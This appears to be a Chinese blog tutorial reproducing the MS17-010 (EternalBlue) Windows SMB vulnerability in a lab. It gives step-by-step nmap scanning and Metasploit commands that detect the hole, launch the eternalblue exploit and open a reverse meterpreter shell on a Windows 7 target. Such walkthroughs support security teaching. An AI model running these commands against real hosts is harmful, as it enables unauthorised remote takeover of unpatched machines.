[永恒之蓝]实战-漏洞复现

环境准备

目标:192.168.164.129(win7)
漏洞:MS17-010(永恒之蓝)
目的:拿到最高权限,进行远程代码执行

一、确定目标及漏洞

1、msfconsole进入MSF模式,再测试能不能ping通目标主机(192.168.164.129),用nmap扫描主机开放445端口,接下用msf测试一下漏洞是否存在。
在这里插入图片描述
在这里插入图片描述

二、查找验证模块并且调用

1、使用#search MS17-010命令,搜索查找MS17-010漏洞模块,如图:
在这里插入图片描述
2、这里我们先选择#1的auxiliary(辅助模块)先进行踩点,查看漏洞是否可以利用,再去进行渗透攻击。

#use auxiliary/scanner/smb/smb_ms17_010  //调用此模块

在这里插入图片描述
3、使用#show options 命令,查看需要设置的选项(Required为yes是必须设置的选项)。
在这里插入图片描述
4、设置目标地址,设置目标端口;

set RHOSTS 192.168.164.129 
set RPORT 445 

在这里插入图片描述
5、最后使用#run或者exploit命令去运行查看漏洞是否存在
在这里插入图片描述
6、Host is likely VULNERABLE to MS17-010! 这个主机存在MS17-010漏洞,可以去利用。 检测到该目标操作系统是Windows 7 专业版 接下来我们可以利用exploits模块进行渗透攻击。
有+号就可以攻击,可以进行IP范围扫描

三、利用exploist模块进行渗透

1、第二步骤的时候检测到目标存在该漏洞,现在我们开始进行渗透。 先使用#back命令退出辅助模块,如图:
在这里插入图片描述
2、使用#search MS17-010命令,搜索MS17-010模块,如图:
在这里插入图片描述
3、我们在第二步的时候使用的是auxiliary模块进行的漏洞检测,这回我们使用exploit模块进行漏洞利用。这里我们选择#2

use exploit/windows/smb/ms17_010_eternalblue

在这里插入图片描述
4、使用#show options命令,查看需要设置的参数,如图:
在这里插入图片描述
5、这里我们看见多出一个payload选项
在这里插入图片描述
在这里插入图片描述
6、这个选项的用处主要是渗透攻击成功后目标机与LHOST建立的Shell连接,所以LHOST参数设置我们自己本地的IP地址,RHOSTS参数还是目标IP

#set RHOSTS 192.168.164.129   //设置exploit,目标IP
#set LHOST 192.168.164.128  //设置payload

在这里插入图片描述
payloads设置

7、最后使用#run命令去运行exploit
在这里插入图片描述
8、显示meterpreter,我们已经所渗透成功了,现在我们已经拿到目标机的Shell了。 我们可以使用#shell命令,在目标机打开一个shell。
在这里插入图片描述
9、输入shell,就可以进入目标靶机的shell命令界面;(出来是乱码:输入chcp 65001 这是utf8编码)
在这里插入图片描述

更多分享微信搜索“安全info”公众号

  • 2
    点赞
  • 31
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

流浪法师12

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值